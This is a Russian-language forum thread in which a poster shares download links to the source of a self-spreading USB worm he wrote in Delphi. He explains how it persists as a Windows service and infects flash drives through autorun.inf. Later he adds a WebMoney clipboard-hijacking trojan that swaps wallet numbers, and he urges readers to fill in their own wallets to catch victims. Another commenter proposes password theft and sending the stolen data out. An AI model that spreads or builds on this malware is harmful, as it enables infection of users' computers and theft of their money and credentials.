Недавно совершенно случайно ко мне на комп в силу проявления мелкой халатности попал RavMonE - эт такой usb червь.. Вроде бы ни чего толкового не делает просто самокопируется и сидит смотрит диски, как только появляется новый диск кидает туда свою копию и autorun.inf - причем делает это без разборов, на все диски (c:\, d:\ и т.д.).. Весит этот чудо червь 950кб)) - имено это меня и натолкнуло на мысль создать своё подобие этого дебила)) Что из этого получилось можете судить сами.. Исходник троя я превожу ниже... Мой трой при запуске ставит себя службой и запускает ту службу.. Далее в черве организован апишный таймер который раз в секунду проверяет наличие вставленых флешек и если есть флешка на которой нет заражения - заражет её собой (своей копией и autorun.inf)... Ни каких гадостей червь не делает только распростряняется по флешкам... Т.о. получился червь меньше того что мне попался в 400 раз и плюс к этому он не тупо везде кидает свои копии а только на флешки и является службой, а не как тот простым авторанящимся приложением.. Вот исходник вместе с упаковщиком и компилятором, для создания троя достаточно просто запустить ВАТ-ник : http://www.ultrashare.net/hosting/fl/17ef355741/worm
Да, я же писал в названии топика. Я в последнее время заметил что такого рода гадость очень сильно распространилась.. Почти на всех что мне "приходили" флешки попадались разные черви.. Причем речь не идёт об одном варианте, лично юзал штук 10 разных червей... Многие таскают с собой длл-ку для скрытия себя из процессов.. Но все без исключения написаны как буд-то ногой)) очень тупо и не продуманно..
а вот сделать что бы он копиров пароли со всей винды и всех программ именно на твою флэшку или отсылал их куда нить было б интересней) а так таких вирусов полно, я уже начал для прикола собирать их в отдельных архивах
Смысл червя не ясен. чтобы был?)) глупо. Добавить хоть какой нибудь мало мальски полезный функционал . А так это пародия на XGray, который был замечен аж в марте 2005 года! (т.е. 3 года назад).
XGray - во первых не из той оперы... во вторых червь не имеет не каких диструктивных функций ибо это всего-лишь основа для создания чего-то своего (я же не случайно даю исходники...), и пример микропроги на делфи... А цель такой проги, такая же как и у файловых вирусов - распространение.. Приятное чувтво того что что-то твоё независимо от тебя живет и плодится у кого-то другого))))
Извеняюсь если что-то уже так - не смотрел на червь.. но вот немного из моих наблюдений за ними: 1. Мне было попался такой червь который кидал себя на флешку только в момент ее подключения - один раз. ; ) 2. И на счет копий на другие диски - даже полезная функция - меня позвал друг - у него на компе был вирус, который не удалялся даже переустановкой системы. ; ) 3. И еще - при двойном щелчке на диске часто открывается отедельное окно (это бесит юзверей.. и меня просили однажды убрать эту вещь - естественно это была зараза) 4. Есть еще всякие непредвиденные "эффекты" (или предвиденные) - напрмер - не работает скрул или изменение настроек (на показ скрытых файлов) не срабатывает. Ну первый это действительно "непредвиденный эффект", а второй таким кажется для пользователя : )
Тоже видел много таких штучек =) Даже размером в полтора килобайта. Кстати на делфи тоже можно сделать еще меньше если модуль компилить с помощью Delphi3 в OBJ и собирать майкрософтовским линкером.
Слова человека любящего споры типа - а вот мой дешка - капитан на корабле!!!))) Вообще если сделать не службой, как у меня, и не делать api-шный счётчик, а использовать sleep() то размер составит окло 1200 байт.. Извиняюсь за жаргон, без соплей известно, кстати таким методом я многие программы в том числе и представленные на аччате писал, но в этом случае этот вариант оказался меньше размером.. Поясняю. Если писать проги этим методом, то их нельзя упаковывать ибо они после этого отказуются работать, а прога написанная без RTL имеет стандартный формат и поэтому может быть упакованной.. Так вот, прога компилированная тем методом имеет вес 3100 байт... На счет дополнительных функций я думаю добавить в черв на всякий пожарный WM-троя... Исходник в этом же топике выложу...
Как и обещал, добавил в этого червя функцию WM-троя (подменщик буфера обмена с номером кошелька).. Теперь червь после пака FSG2 весит 3029 байт, т.е. почти дотягивает до трёх килобай... Вот исходник: virusoff.pisem.su/WM_WORM.RAR . Компилировать исходник нужно так же как и предыдущий... В случае применения не забудьте в константах вставить свои кошельки, авось кто-то и поймается))) Code: U = 'U11111111111'; E = 'E22222222222'; R = 'R33333333333'; Z = 'Z44444444444';
Я же ответил на вопрос, по поводу целесообразности применения этого метода.. Зачем создавать оффтопно-флудёрские посты??
да плодится ето наверное цель жызни вируса... до етого как его антивирус встретит [img=http://img245.imageshack.us/img245/1395/capture2ql4.th.jpg]
